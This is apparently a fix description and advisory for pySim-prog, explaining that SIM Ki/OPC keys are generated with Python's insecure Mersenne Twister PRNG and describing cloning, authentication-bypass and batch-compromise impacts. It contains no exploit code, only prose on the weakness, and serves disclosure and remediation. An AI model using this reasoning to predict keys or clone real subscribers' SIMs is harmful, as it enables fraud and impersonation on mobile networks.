pySim-prog: fix Insecure PRNG for SIM Authentication Keys (CWE-338)
Root Cause: pySim-prog.py uses Python's random module (Mersenne Twister MT19937) to generate Ki and OPC — the root authentication keys for SIM cards. MT19937 is a deterministic PRNG that is not cryptographically secure. Its internal state (624 × 32-bit words, 19,937 bits) can be fully recovered after observing 624 consecutive outputs.
Impact: 1. SIM Card Cloning: An attacker who determines the PRNG state can predict all Ki/OPC values generated before and after. With these keys, SIM cards can be cloned. 2. Network Authentication Bypass: Ki/OPC are used in the Milenage algorithm for 3G/4G/5G authentication. Predictable keys mean an attacker can authenticate as any subscriber whose SIM was provisioned with the weak RNG. 3. Batch Compromise: In bulk provisioning scenarios (pySim-prog's primary use case), hundreds or thousands of SIMs may be programmed sequentially. Compromising one batch means recovering the PRNG state to predict all keys.
